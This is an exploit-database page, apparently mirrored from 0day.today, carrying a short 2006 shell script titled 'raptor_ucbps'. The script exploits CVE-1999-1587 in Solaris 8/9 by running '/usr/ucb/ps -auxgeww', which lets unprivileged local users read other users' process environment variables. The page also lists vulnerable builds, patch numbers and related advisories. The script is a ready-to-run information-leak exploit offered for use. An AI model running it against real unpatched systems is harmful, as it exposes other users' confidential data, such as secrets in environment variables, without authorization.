Lucene search
K

Solaris 8/9 ps - Environment Variable Information leak Exploit

🗓️ 08 Nov 2016 00:00:00Reported by Marco IvaldiType 
zdt
 zdt
🔗 0day.today👁 36 Views

Solaris 8/9 ps Environment Variable Information lea

Related
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the /usr/ucb/ps component of the Solaris operating system, which allows a hacker to access confidential information
23 Dec 202400:00
bdu_fstec
Circl
CVE-1999-1587
17 Sep 202421:34
circl
CVE
CVE-1999-1587
29 Mar 200601:00
cve
Cvelist
CVE-1999-1587
29 Mar 200601:00
cvelist
Exploit DB
Solaris 8/9 ps - Environment Variable Information leak
26 Jul 200600:00
exploitdb
EUVD
EUVD-1999-1568
7 Oct 202500:30
euvd
NVD
CVE-1999-1587
31 Dec 199905:00
nvd
OpenVAS
Solaris Update for ps cmd 120239-01
3 Jun 200900:00
openvas
OpenVAS
Solaris Update for ps cmd 120240-01
3 Jun 200900:00
openvas
OpenVAS
Solaris Update for ps cmd 120239-01
3 Jun 200900:00
openvas
Rows per page
#!/bin/sh
 
#
# $Id: raptor_ucbps,v 1.1 2006/07/26 12:15:42 raptor Exp $
#
# raptor_ucbps - information leak with Solaris /usr/ucb/ps
# Copyright (c) 2006 Marco Ivaldi <[email protected]>
#
# A security vulnerability in the "/usr/ucb/ps" (see ps(1B)) command may allow 
# unprivileged local users the ability to see environment variables and their 
# values for processes which belong to other users (Sun Alert ID: 102215).
#
# Absolutely nothing fancy, but it may turn out to be useful;)
#
# Usage:
# $ chmod +x raptor_ucbps
# $ ./raptor_ucbps
# [...]
#
# Vulnerable platforms (SPARC):
# Solaris 8 without patch 109023-05 [tested]
# Solaris 9 without patch 120240-01 [tested]
#
# Vulnerable platforms (x86):
# Solaris 8 without patch 109024-05 [untested]
# Solaris 9 without patch 120239-01 [untested]
#
 
echo "raptor_ucbps - information leak with Solaris /usr/ucb/ps"
echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>"
echo
 
/usr/ucb/ps -auxgeww

#  0day.today [2018-04-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Nov 2016 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.00642
36